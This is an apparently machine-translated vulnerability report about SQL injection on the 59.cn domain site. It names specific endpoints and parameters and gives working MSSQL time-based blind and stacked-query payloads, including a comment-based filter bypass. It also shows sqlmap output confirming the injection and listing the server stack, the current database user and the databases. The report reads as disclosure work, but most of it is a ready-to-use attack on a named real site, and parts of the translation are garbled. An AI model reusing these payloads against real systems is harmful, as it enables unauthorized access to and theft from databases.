59. The interconnected main site has the SQL vulnerability that can be bypassed
It hurts, but it still bypasses.
1, http://www.59.cn/domain/search.aspverification payload. Btnen = 1 & domain_tail = '/**/if (' B '/**/>/**/'A ') /**/WAITFOR/**/DELAY/**/'0: 0: 5' -- & domwhois = 1 & freehosttype = 1 & seldomains = 1 & domain = 12, http://www.59.cn/server/search.asp? A = 1 & action = 1 & B = 1' % 22 & mroad = 1 & muse = 1 & rid = 20'
sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: btnen=1&domain_tail=';WAITFOR DELAY '0:0:5'--&domwhois=1&freehosttype=1&seldomains=1&domain=1 Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: btnen=1&domain_tail=' WAITFOR DELAY '0:0:5'--&domwhois=1&freehosttype=1&seldomains=1&domain=1 Vector: IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'-----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2012current user: 'oa'available databases [6]:[*] master[*] model[*] msdb[*] netspace[*] ReportServe[*] tempdb
~~